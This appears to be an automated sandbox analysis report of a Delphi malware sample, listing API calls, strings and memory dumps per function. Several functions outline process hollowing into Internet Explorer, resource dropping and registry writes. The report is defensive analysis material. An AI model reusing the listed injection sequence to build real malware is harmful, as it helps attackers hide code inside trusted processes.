Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004306E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30

APIs

GetParent.USER32(00000000), ref: 0043070D
SendMessageA.USER32(00000000,00000000,00000465,00000105), ref: 00430713

Strings

hKF, xrefs: 004306EC

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00434D54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19

APIs

WindowFromPoint.USER32(=LC,?), ref: 00434D5A

Part of subcall function 00434D0C: GlobalFindAtomA.KERNEL32(00000000), ref: 00434D20
Part of subcall function 00434D0C: GetPropA.USER32(00000000,00000000), ref: 00434D37

GetParent.USER32(00000000), ref: 00434D71

Strings

=LC, xrefs: 00434D58

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Analysis Process: FB_390E.tmp.exe PID: 3560 Parent PID: 3424

Executed Functions

Function 0040551C, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00405538
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405556
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405574
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405592

Part of subcall function 00405358: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00405375
Part of subcall function 00405358: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll), ref: 0040538C
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,?), ref: 004053BC
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,?,kernel32.dll), ref: 00405420
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 00405456
Part of subcall function 00405358: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405469
Part of subcall function 00405358: FindClose.KERNEL32(000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040547B
Part of subcall function 00405358: lstrlenA.KERNEL32(?,000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405487
Part of subcall function 00405358: lstrcpynA.KERNEL32(0000005D,?,00000104), ref: 004054BB
Part of subcall function 00405358: lstrlenA.KERNEL32(?,0000005D,?,00000104), ref: 004054C7
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 004054E9

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004055DB
RegQueryValueExA.ADVAPI32(?,00405788,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405621,?,80000001), ref: 004055F9
RegCloseKey.ADVAPI32(?,00405628,00000000,00000000,00000005,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040561B
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405638
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405645
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040564B
lstrlenA.KERNEL32(00000000), ref: 00405676
lstrcpynA.KERNEL32(00000000,00000000,00000105,00000000), ref: 004056BD
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 004056CD
lstrcpynA.KERNEL32(00000000,00000000,00000105,00000000), ref: 004056F5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00405705
lstrcpynA.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0040572B
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0040573B

Strings

., xrefs: 00405688
Software\Borland\Delphi\Locales, xrefs: 00405588
Software\Borland\Locales, xrefs: 0040554C, 0040556A

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 0040551C, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,0041278C), ref: 00405538
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,0041278C), ref: 00405556
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,0041278C), ref: 00405574
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405592

Part of subcall function 00405358: GetModuleHandleA.KERNEL32(kernel32.dll,00406118,00400000,0041278C), ref: 00405375
Part of subcall function 00405358: GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,00406118,00400000,0041278C), ref: 0040538C
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,?), ref: 004053BC
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405420
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405456
Part of subcall function 00405358: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405469
Part of subcall function 00405358: FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 0040547B
Part of subcall function 00405358: lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405487
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000), ref: 004054BB
Part of subcall function 00405358: lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118), ref: 004054C7
Part of subcall function 00405358: lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 004054E9

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004055DB
RegQueryValueExA.ADVAPI32(?,00405788,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405621,?,80000001), ref: 004055F9
RegCloseKey.ADVAPI32(?,00405628,00000000,?,?,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040561B
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405638
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405645
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040564B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405676
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056BD
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004056CD
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056F5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405705
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040572B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 0040573B

Strings

Software\Borland\Locales, xrefs: 0040554C, 0040556A
Software\Borland\Delphi\Locales, xrefs: 00405588

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CB64, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 217

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040CC07
Sleep.KERNEL32(00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC16

Part of subcall function 0040C9E0: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,00000000,0040CC3D,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040C9F1

GetThreadContext.KERNEL32(?,00000000), ref: 0040CC5B
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC83
NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC98
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,?,00000000,00000032,00000000), ref: 0040CCB4
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,?,00000000,00000032,00000000), ref: 0040CCCF
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0), ref: 0040CCEC
WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,?), ref: 0040CD44
WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0040CD64
SetThreadContext.KERNEL32(?,00000000), ref: 0040CD80
ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 0040CD89
VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CD9F
TerminateProcess.KERNEL32(?,00000000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CDB0

Strings

D, xrefs: 0040CBE1

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 00405628, Relevance: 15.1, APIs: 10, Instructions: 98

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405638
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405645
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040564B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405676
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056BD
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004056CD
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056F5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405705
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040572B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 0040573B

Strings

Software\Borland\Locales, xrefs: 0040554C, 0040556A
Software\Borland\Delphi\Locales, xrefs: 00405588

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CFC0, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 182

APIs

DeleteFileA.KERNEL32(00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D011
FindResourceA.KERNEL32(00400000,?,?), ref: 0040D024
SizeofResource.KERNEL32(00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D032
LoadResource.KERNEL32(00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D040
LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D048
FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D073
CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040D0AC
CloseHandle.KERNEL32(00000000), ref: 0040D0B2
FindExecutableA.SHELL32(00000000,00000000,?), ref: 0040D0E2
DeleteFileA.KERNEL32(00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00000000,00000000,00400000,00000000,00400000,00000000,00000000), ref: 0040D12D
GetStartupInfoA.KERNEL32(?), ref: 0040D13F

Part of subcall function 0040CB64: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040CC07
Part of subcall function 0040CB64: Sleep.KERNEL32(00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC16
Part of subcall function 0040CB64: GetThreadContext.KERNEL32(?,00000000), ref: 0040CC5B
Part of subcall function 0040CB64: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC83
Part of subcall function 0040CB64: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0), ref: 0040CCEC
Part of subcall function 0040CB64: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,?), ref: 0040CD44
Part of subcall function 0040CB64: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0040CD64
Part of subcall function 0040CB64: SetThreadContext.KERNEL32(?,00000000), ref: 0040CD80
Part of subcall function 0040CB64: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 0040CD89
Part of subcall function 0040CB64: VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CD9F
Part of subcall function 0040CB64: TerminateProcess.KERNEL32(?,00000000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CDB0

Part of subcall function 0040CF84: SHGetSpecialFolderLocation.SHELL32(00000000,00000026), ref: 0040CF92
Part of subcall function 0040CF84: SHGetPathFromIDListA.SHELL32(?,?,?,0040D197), ref: 0040CFA1

Part of subcall function 00404A48: SysFreeString.OLEAUT32(?,00000000,00000000,0040D25D,0040D292,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 00404A5B

Strings

kkddkioeeijnasdfsadfaj3u3jdjnhu3iu3uu333, xrefs: 0040D1E2
UI12RT71, xrefs: 0040D1CF
xxx.html, xrefs: 0040D090, 0040D0C6, 0040D0ED
\Internet Explorer\iexplore.exe, xrefs: 0040D1A0
.exe, xrefs: 0040D17E

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CFBF, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 181

APIs

DeleteFileA.KERNEL32(00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D011
FindResourceA.KERNEL32(00400000,?,?), ref: 0040D024
SizeofResource.KERNEL32(00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D032
LoadResource.KERNEL32(00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D040
LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D048
FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 0040D073
CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040D0AC
CloseHandle.KERNEL32(00000000), ref: 0040D0B2
FindExecutableA.SHELL32(00000000,00000000,?), ref: 0040D0E2
DeleteFileA.KERNEL32(00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00000000,00000000,00400000,00000000,00400000,00000000,00000000), ref: 0040D12D
GetStartupInfoA.KERNEL32(?), ref: 0040D13F

Part of subcall function 0040CB64: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040CC07
Part of subcall function 0040CB64: Sleep.KERNEL32(00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC16
Part of subcall function 0040CB64: GetThreadContext.KERNEL32(?,00000000), ref: 0040CC5B
Part of subcall function 0040CB64: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CC83
Part of subcall function 0040CB64: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,?,00000000,00000032,00000000,0040CDE0), ref: 0040CCEC
Part of subcall function 0040CB64: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,?), ref: 0040CD44
Part of subcall function 0040CB64: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0040CD64
Part of subcall function 0040CB64: SetThreadContext.KERNEL32(?,00000000), ref: 0040CD80
Part of subcall function 0040CB64: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 0040CD89
Part of subcall function 0040CB64: VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CD9F
Part of subcall function 0040CB64: TerminateProcess.KERNEL32(?,00000000,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040CDB0

Part of subcall function 0040CF84: SHGetSpecialFolderLocation.SHELL32(00000000,00000026), ref: 0040CF92
Part of subcall function 0040CF84: SHGetPathFromIDListA.SHELL32(?,?,?,0040D197), ref: 0040CFA1

Part of subcall function 00404A48: SysFreeString.OLEAUT32(?,00000000,00000000,0040D25D,0040D292,00400000,00000000,00000000,0040D28B,?,?,?,?,0000002F,00000000,00000000), ref: 00404A5B

Strings

kkddkioeeijnasdfsadfaj3u3jdjnhu3iu3uu333, xrefs: 0040D1E2
UI12RT71, xrefs: 0040D1CF
xxx.html, xrefs: 0040D090, 0040D0C6, 0040D0ED
\Internet Explorer\iexplore.exe, xrefs: 0040D1A0
.exe, xrefs: 0040D17E

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040AD24, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040AC60: GetThreadLocale.KERNEL32 ref: 0040AC82
Part of subcall function 0040AC60: GetSystemMetrics.USER32(0000004A), ref: 0040ACD5
Part of subcall function 0040AC60: GetSystemMetrics.USER32(0000002A), ref: 0040ACE4

Part of subcall function 0040980C: GetThreadLocale.KERNEL32(00000000,0040991F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409828

GetThreadLocale.KERNEL32(00000000,0040AFEF,?,?,00000000,00000000), ref: 0040AD5A

Part of subcall function 00409758: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409776

Part of subcall function 004097A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040ADD6,00000000,0040AFEF,?,?,00000000,00000000), ref: 004097B7

Part of subcall function 00409A94: GetThreadLocale.KERNEL32(?,00000000,00409C64,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AC3

Part of subcall function 004099E4: GetThreadLocale.KERNEL32(?,00000000,00409A7B,?,?,00000000), ref: 004099FC
Part of subcall function 004099E4: GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A7B,?,?,00000000), ref: 00409A2C
Part of subcall function 004099E4: EnumCalendarInfoA.KERNEL32(Function_00009930,00000000,00000000,00000004), ref: 00409A37
Part of subcall function 004099E4: GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A7B,?,?,00000000), ref: 00409A55
Part of subcall function 004099E4: EnumCalendarInfoA.KERNEL32(Function_0000996C,00000000,00000000,00000003), ref: 00409A60

Strings

:mm, xrefs: 0040AF8D
mmmm d, yyyy, xrefs: 0040AE56
:mm:ss, xrefs: 0040AFAA
m/d/yy, xrefs: 0040AE29
AMPM , xrefs: 0040AF7D
AMPM, xrefs: 0040AF6E

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040C714, Relevance: 9.1, APIs: 6, Instructions: 98

APIs

CloseHandle.KERNEL32(00000000), ref: 0040C7FF

Part of subcall function 00403064: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000,00000000,0040C759,00000000,0040C81F,?,?,?,00000000), ref: 00403088
Part of subcall function 00403064: GetCommandLineA.KERNEL32(?,00000000,00000000,0040C759,00000000,0040C81F,?,?,?,00000000), ref: 0040309A

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040C774
SetFilePointer.KERNEL32(00000000,000000FC,00000000,00000002,00000000,0040C81F,?,?,?,00000000), ref: 0040C78A
ReadFile.KERNEL32(00000000,004112E6,00000004,00000000,00000000), ref: 0040C79C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,000000FC,00000000,00000002,00000000,0040C81F,?,?,?,00000000), ref: 0040C7BB
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040C7E5

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004017D0, Relevance: 9.0, APIs: 7, Instructions: 298

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 0040159C

Part of subcall function 00401534: Sleep.KERNEL32(00000000,004015F1), ref: 0040154A
Part of subcall function 00401534: Sleep.KERNEL32(0000000A,00000000,004015F1), ref: 00401563

Sleep.KERNEL32(00000000), ref: 00401887
Sleep.KERNEL32(0000000A,00000000), ref: 0040189D
Sleep.KERNEL32(00000000), ref: 004018CB
Sleep.KERNEL32(0000000A,00000000), ref: 004018E1
Sleep.KERNEL32(00000000), ref: 00401A10
Sleep.KERNEL32(0000000A,00000000), ref: 00401A26

Part of subcall function 004014BC: VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401ACB), ref: 004014D2

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CA14, Relevance: 6.1, APIs: 4, Instructions: 66

APIs

RegOpenKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0040CA5A
RegOpenKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0040CA69
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000000,80000001,00000000,00000000,00000000,0040CAC6,?,00000000,00000000), ref: 0040CA95
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,80000001,00000000,00000000,00000000,0040CAC6,?,00000000,00000000), ref: 0040CA9E

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CDF4, Relevance: 6.1, APIs: 4, Instructions: 64

APIs

RegOpenKeyA.ADVAPI32(80000001,00000000,004112E6), ref: 0040CE3C
RegOpenKeyA.ADVAPI32(80000001,00000000,004112E6), ref: 0040CE4B
RegQueryValueExA.ADVAPI32(004112E6,00000000,00000000,00000000,?,00000100,80000001,00000000,004112E6,00000000,0040CEAC,?,?,?,?,0040CEEA), ref: 0040CE6C
RegCloseKey.ADVAPI32(004112E6,004112E6,00000000,00000000,00000000,?,00000100,80000001,00000000,004112E6,00000000,0040CEAC,?,?,?), ref: 0040CE8C

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040AC60, Relevance: 4.6, APIs: 3, Instructions: 56

APIs

GetThreadLocale.KERNEL32 ref: 0040AC82
GetSystemMetrics.USER32(0000004A), ref: 0040ACD5
GetSystemMetrics.USER32(0000002A), ref: 0040ACE4

Part of subcall function 0040AC04: GetCPInfo.KERNEL32(00000000,?), ref: 0040AC14

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

